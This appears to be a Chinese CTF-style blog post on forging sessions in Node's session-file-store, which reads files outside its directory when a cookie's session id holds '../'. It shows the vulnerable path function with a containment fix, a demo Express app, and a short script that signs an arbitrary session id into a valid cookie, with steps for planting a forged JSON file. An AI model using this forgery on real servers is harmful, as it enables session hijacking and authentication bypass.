session-file-store库的session伪造

前言

学了几天node,接触到的知识点这里记录一下。

利用过程

漏洞点分析这里就不写了,参考:https://xz.aliyun.com/t/4676#toc-2
文章写得很详细。这里把最根本的原因写出来。

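sessionPath: function (options, sessionId) {
  // Build the on-disk path of a session file.
  // The original implementation returned
  //   path.join(options.path, sessionId + options.fileExtension)
  // as is. sessionId arrives from the client cookie, so a value containing
  // "../" made the store read a .json file outside options.path.
  var full = path.join(options.path, sessionId + options.fileExtension);
  // Containment check: the resolved file must stay inside the session
  // directory. path.relative() starts with ".." (or is absolute, e.g. on a
  // different Windows drive) when it does not.
  var base = path.resolve(options.path);
  var rel = path.relative(base, path.resolve(full));
  if (rel === '' || rel === '..' || rel.indexOf('..' + path.sep) === 0 || path.isAbsolute(rel)) {
    throw new Error('invalid session id');
  }
  return full;
}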

这里 sessionId 没有做任何路径过滤,导致可以直接让 session-file-store 把 sessions 目录之外的文件夹里的 json 文件当作 session 读取。修复思路是对 sessionId 做归一化,并检查拼接后的路径仍位于 options.path 目录之内。

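var express = require('express');
var app = express();
var session = require('express-session');
var FileStore = require('session-file-store')(session);

// Demo session setup. `new FileStore()` with no options persists sessions as
// files under its default directory (not configured here). `secret` signs the
// session cookie, so anyone who knows it can produce a valid cookie for any
// session id; read it from the environment and only fall back to the
// well-known documentation value for local experiments.
app.use(session({
  store: new FileStore(),
  secret: process.env.SESSION_SECRET || 'keyboard cat',
  resave: false,
  saveUninitialized: false,
  rolling: true,
}));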
// Page-view counter kept in the session.
// First request: initialise the counter and answer with plain text.
// Later requests: bump the counter and render it as a small HTML fragment.
app.get('/', function (req, res) {
  var views = req.session.views;
  if (!views) {
    req.session.views = 1;
    res.end('Welcome to the file session demo. Refresh page!');
    return;
  }
  req.session.views++;
  // `views` is only ever set to 1 or incremented above, so the value
  // interpolated into the markup is numeric.
  res.setHeader('Content-Type', 'text/html');
  res.write('<p>views: ' + req.session.views + '</p>');
  res.end();
});
// Start the demo server on port 1337 and log the bound address once listening.
var server = app.listen(1337, function () {
  var addr = server.address();
  console.log('Example app listening at http://%s:%s', addr.address, addr.port);
});

伪造脚本

var cookie = require('cookie');
var crc = require('crc').crc32;
var debug = require('debug')('express-session');
var deprecate = require('depd')('express-session');
var parseUrl = require('parseurl');
var uid = require('uid-safe').sync
, onHeaders = require('on-headers')
, signature = require('cookie-signature')

var val = ""; // session id to be signed (author's note: the modified sessionID)
var secret = ""; // the express-session `secret` used to sign the cookie
var name = "name"; // cookie name — NOTE(review): must match the name the server's session middleware uses; verify
var options = undefined; // no extra cookie.serialize() attributes
// express-session's cookie value is "s:" followed by signature.sign(id, secret).
// A value that passes the server's check can only be produced by whoever holds
// `secret`, which is why the secret must be unguessable and never the docs default.
var signed = 's:' + signature.sign(val, secret);
var data = cookie.serialize(name, signed, options);

debug('set-cookie %s', data);
console.log(data);

把此脚本放在 node_modules/express-session 目录下
把伪造的 json 放在根目录;具体题目的路径不一样,对应修改一下即可。

岂不美哉。
